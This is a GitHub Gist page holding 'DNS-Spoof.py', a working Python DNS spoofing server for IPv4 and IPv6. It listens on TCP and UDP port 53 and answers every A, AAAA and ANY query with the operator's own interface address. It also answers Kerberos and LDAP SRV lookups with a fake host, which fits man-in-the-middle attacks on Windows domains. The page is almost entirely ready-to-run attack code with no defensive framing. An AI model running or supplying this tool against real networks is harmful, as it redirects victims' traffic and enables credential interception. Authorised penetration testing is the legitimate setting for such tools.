Last active
June 5, 2021 08:12
-
-
Save FrankSpierings/7d8accbffd22df897dc4e33629f7f0d2 to your computer and use it in GitHub Desktop.
DNS-Spoof.py (IPv6 and IPv4)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
import threading | |
import socketserver | |
import time | |
from dnslib import * | |
import struct | |
import netifaces | |
import logging | |
import logging.config | |
import json | |
import argparse | |
logconfig = json.loads('''{ | |
"version": 1, | |
"disable_existing_loggers": false, | |
"formatters": { | |
"standard": { | |
"format": "%(levelname)s:%(name)s:%(message)s" | |
}, | |
"colored": { | |
"()": "colorlog.ColoredFormatter", | |
"format": "%(log_color)s%(asctime)s %(levelname)-8s%(reset)s %(blue)s%(message)s" | |
} | |
}, | |
"handlers": { | |
"default": { | |
"level": "DEBUG", | |
"formatter": "colored", | |
"class": "logging.StreamHandler", | |
"stream": "ext://sys.stdout" | |
} | |
}, | |
"loggers": { | |
"": { | |
"handlers": [ | |
"default" | |
], | |
"level": "DEBUG", | |
"propagate": true | |
} | |
} | |
}''') | |
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler): | |
def handle(self): | |
self.logger = logging.getLogger(self.__class__.__name__) | |
size = self.request.recv(2) | |
size = struct.unpack('>H', size)[0] | |
data = self.request.recv(size) | |
reply = dns_reply(self, data) | |
reply = reply.pack() | |
reply = struct.pack('>H', len(reply)) + reply | |
self.request.sendall(reply) | |
class ThreadedUDPRequestHandler(socketserver.BaseRequestHandler): | |
def handle(self): | |
self.logger = logging.getLogger(self.__class__.__name__) | |
data = self.request[0] | |
reply = dns_reply(self, data) | |
reply = reply.pack() | |
self.request[1].sendto(reply, self.client_address) | |
def dns_reply(self, data): | |
self.logger.debug('{0} Raw query:\n{1}'.format(self.client_address[0], data)) | |
query = DNSRecord.parse(data) | |
self.logger.info('{0} Query:\n{1}'.format(self.client_address[0], query)) | |
reply = query.reply() | |
for q in query.questions: | |
# self.logger.debug('Question: {0}'.format(q)) | |
if q.qtype == QTYPE.A: | |
if ANSWER_A is not None: | |
reply.add_answer(RR(str(q.qname),QTYPE.A,rdata=A(ANSWER_A))) | |
elif q.qtype == QTYPE.AAAA: | |
if ANSWER_AAAA is not None: | |
reply.add_answer(RR(str(q.qname),QTYPE.AAAA,rdata=AAAA(ANSWER_AAAA))) | |
elif q.qtype == QTYPE.ANY: | |
if ANSWER_A is not None: | |
reply.add_answer(RR(str(q.qname),QTYPE.A,rdata=A(ANSWER_A))) | |
if ANSWER_AAAA is not None: | |
reply.add_answer(RR(str(q.qname),QTYPE.AAAA,rdata=AAAA(ANSWER_AAAA))) | |
elif q.qtype == QTYPE.SRV: | |
port = 0 | |
if str(q.qname).startswith('_kerberos'): | |
port = 88 | |
elif str(q.qname).startswith('_ldap'): | |
port = 389 | |
else: | |
port = 0 | |
reply.add_answer(RR(str(q.qname),QTYPE.SRV,rdata=SRV(weight=1000, priority=0, port=port, target='fake.local'))) | |
else: | |
pass | |
self.logger.info('{0} Reply:\n{1}'.format(self.client_address[0], reply)) | |
return reply | |
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer): | |
address_family = socket.AF_INET6 | |
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer): | |
address_family = socket.AF_INET6 | |
if __name__ == "__main__": | |
parser = argparse.ArgumentParser(description='Spoof DNS replies') | |
parser.add_argument('interface', help='Interface to listen on') | |
parser.add_argument('-p', dest='port', type=int, default=53, help='Port to listen on') | |
args = parser.parse_args() | |
logging.config.dictConfig(logconfig) | |
logger = logging.getLogger() | |
HOST = "" | |
PORT = args.port | |
servers = [ ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler), | |
ThreadedUDPServer((HOST, PORT), ThreadedUDPRequestHandler)] | |
ANSWER_A = None | |
ANSWER_AAAA = None | |
try: | |
ANSWER_A = netifaces.ifaddresses(args.interface)[netifaces.AF_INET][0]['addr'] | |
except: | |
pass | |
try: | |
ANSWER_AAAA = netifaces.ifaddresses(args.interface)[netifaces.AF_INET6][0]['addr'].split('%')[0] | |
except: | |
pass | |
logger.info("Ipv4 Address: {0}".format(ANSWER_A)) | |
logger.info("Ipv6 Address: {0}".format(ANSWER_AAAA)) | |
for server in servers: | |
ip, port = server.server_address[:2] | |
server.allow_reuse_address = True | |
server_thread = threading.Thread(target=server.serve_forever) | |
server_thread.daemon = True | |
server_thread.start() | |
logger.info('CTRL+C to end') | |
try: | |
while True: | |
time.sleep(1) | |
except: # KeyboardInterrupt: | |
pass | |
for server in servers: | |
server.shutdown() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment